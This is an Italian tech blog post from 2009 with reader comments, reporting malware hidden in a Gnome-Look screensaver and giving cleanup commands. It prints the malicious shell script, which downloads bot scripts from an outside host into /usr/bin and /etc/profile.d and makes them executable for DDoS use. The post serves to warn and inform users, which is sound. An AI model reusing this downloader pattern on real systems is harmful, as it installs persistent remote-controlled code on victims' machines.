Malware dentro ad uno screensaver su Gnome-Look

Pubblicato: 10 dic 2009 da Lpt on fire!

Ieri è stato trovato del malware all’interno di uno screensaver con una cascata caricato sul popolare sito Gnome-Look.

Il codice malevolo scaricava alcuni comandi da un sito e li eseguiva per partecipare ad attacchi DDoS ed aggiornarsi. Al momento lo screensaver è stato eliminato ed il botlord ha cancellato i file che venivano scaricati dal malware.

Nel caso foste stati infettati senza rendervene conto per pulire il sistema dovete lanciare:

sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh /usr/bin/index.php /usr/bin/run.bash
sudo dpkg -r app5552

Dopo il salto trovate il codice incriminato.

#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo —————–
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo —————–
clear
exit

Nonostante i sistemi unix-like siano sistemi con un’architettura più sicura è bene ricordare che bisogna comunque fare attenzione a quello che si installa sulla propria macchina. Nonostante questo tipo di attacchi siano piuttosto rari non è la prima volta che avvengono. Possono anche essere nascosti all’interno degli script per la compilazione e non solo dentro al programma vero e proprio.

Via | UbuntuForums

(1 Voti | Media: 5 su 5)

12 commenti

Categorie

Articoli simili

Hamster arriverà su GNOME Shell spostando il calendario sulla destra del 09 lug 2011

Mozilla sponsorizza l'accessibilità in GNOME del 05 feb 2010

Installare i wallpaper di National Geographic su Linux del 21 dic 2009

Linux e i malware: che sia colpa di Google? del 16 dic 2009

BluBuntu, dai una nota di colore ad Ubuntu del 12 ago 2006

Argomenti Simili

malware linux, virus linux

Gallerie Correlate

Commenti dei lettori

(Inserisci un commento - Nascondi commenti anonimi)

Veronello
10 dic 2009 - 14:32 - #1

0 punti

ennesima dimostrazione del fatto che nessun sistema può essere considerato sicuro…e che contro la mancanza di un cervello tra la tastiera ed il monitor non c’è rimedio software.
progalba
10 dic 2009 - 14:41 - #2

-3 punti

non so xke vi ostinate.
Windows 95 installato su un vecchio pc nella mia vecchia biblioteca non ha mai subito 1 attacco in tutta la sua vita.
Semplicemente non è mai stato online.
weepu
10 dic 2009 - 15:27 - #3

0 punti

Si’, ma chi e’ quell’idiota che installa screensaver scaricati come utente root?????
aska
10 dic 2009 - 16:17 - #4

0 punti

@weepu: la prassi normale per installare qualcosa è quella di mettere la password del proprio utente (e lanciare l’operazione tramite ’sudo’ ma l’utente medio questo non lo sa).
io non ho idea di come funzioni per gli screensaver poichè non mi interessano ma se dovessi installarne uno, non mi sorprenderei se mi richiedesse privilegi amministrativi, in fondo si tratta di installare qualcosa, no? se vado sul package manager di ubuntu devo mettere la password del mio utente.. se lo screensaver si trova li e lo installo, il mio pc è automaticamente infettato.

Se questi di gnome-look hanno un repository per ubuntu, da synaptic tramite sudo posso installare lo screen saver incriminato.

In questo caso secondo me la colpa va sia all’utente che installa tutto quello che gli capita a tiro, sia a quelli di gnome-look che dovrebbero controllare quello che mettono a disposizione. Mi fermo qui perchè non so nulla di gnome-look (pur usando gnome) e rischio di prendere cantonate.. magari gnome-look è una comunità di utenti dove chiunque può pubblicare quello che sviluppa.. in tal caso l’utente installa quello che vuole a suo rischio.
Commento #5 (-4 punti) - 10 dic 2009 - 16:17 - Apri commento
rendo
10 dic 2009 - 19:59 - #5 (nascondi)

-4 punti

hhahahaha sfatato il mito linux immune da virus hahahaahh torniamo a zio bill almeno la funziona tutto
Martin44
10 dic 2009 - 20:42 - #6

0 punti

Oddio.. ho abbandonato P.I. apposta per i commenti inutili di Trolletti senza apparentemente una vita sociale.. e me li ritrovo pure qua…
tia
10 dic 2009 - 22:19 - #7

1 punto

oh io proporrei di chiudere i commenti da tutto blogo.it va…
Tra il malato fanatico di google, quelli che non sanno neanche cosa dicono tipo il #5, troll e compagnia bella..

è sempre più una schifezza!
tia
10 dic 2009 - 22:21 - #8

0 punti

Che poi credo che questo Rendo potrebbe essere proprio g h o s t perchè non mi lascia dargli un voto negativo dicendomi

“Errore - Troppi voti allo stesso commentatore nelle ultime 24 ore”

Ma l’unico che voto (in negativo) è solo il fanatico… Rendo non l’ho mai votato..
strana sta cosa..
Gianvacca
10 dic 2009 - 22:21 - #9

0 punti

Che c’entrano i privilegi di amministratore? Se anche fosse stato uno script che ’semplicemente’ ti elimina la home, pensate che gli utenti colpiti ne avrebbero gioito?
gp42
11 dic 2009 - 00:41 - #10

0 punti

@Gianvacca (ed un pò in generale):
se io ti dico scrivi rm -rf /home/nomeutente/ la colpa non è certo del sistema operativo ma sono io che sono bastXXdo e l’utente che ingenuamente si fida di me.
Se questo non è immune nessuno.
d4n
11 dic 2009 - 09:56 - #11

0 punti

Scusate non ho capito una cosa. Ma questo malware cosa danneggia precisamente che problemi crea?
Il Conte Ignoto
11 dic 2009 - 19:21 - #12

0 punti

@d4n: rende il tuo pc un agente, più noto come “zombie”: la macchina infetta partecipa, pilotata da remoto o in autonomia, ad attacchi distribuiti indirizzati a particolari bersagli. Ddos è acronimo di “distributed denial of service”, uno degli attacchi più noti che ha per obiettivo l’esaurimento delle risorse della macchina bersaglio, con conseguente “down” dei servizi da essa forniti.
Con un ddos puoi ad esempio rendere irraggiungibile un webserver inondandolo di richieste fasulle.